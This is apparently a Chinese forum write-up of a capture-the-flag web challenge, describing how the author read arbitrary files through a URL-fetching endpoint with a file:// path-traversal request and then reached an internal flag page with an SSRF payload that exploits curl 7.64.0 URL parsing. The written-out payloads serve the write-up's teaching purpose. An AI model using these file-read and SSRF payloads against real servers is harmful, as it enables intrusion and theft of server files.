-
-
[原创]第四题 飞蛾扑火
-
发表于: 2022-5-15 14:27 2858
-
通过访问靶机,HTML源码中可以看到提示phpinfo.php
,并且可以看到一个URL请求外部链接的功能点。
对url.php
的url
参数进行测试,发现可以直接使用file
协议进行任意文件读取,这里首先读取一下url.php
。/url.php?url=file://localhost/../../../../var/www/html/url.php
从源码中可以直到需要使用靶机ssrf
访问http://123.57.254.42/flag.php
即可获取flag。
接着访问/phpinfo.php
可以得知目前的curl
的版本为7.64.0
,在这个版本的curl
可以使用如下payload
进行ssrf
/url.php?url=123.57.254.42://localhost/../flag.php
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
- [原创] 签到题 生死较量 1034
- [原创]第一题 失控的AI 2580
- KCTF 2022春季赛 一触即发 WP 3874
- [原创]第四题 飞蛾扑火 2859
- [原创] KCTF2021秋季赛 身在何处 WP 8000
看原图
赞赏
雪币:
留言: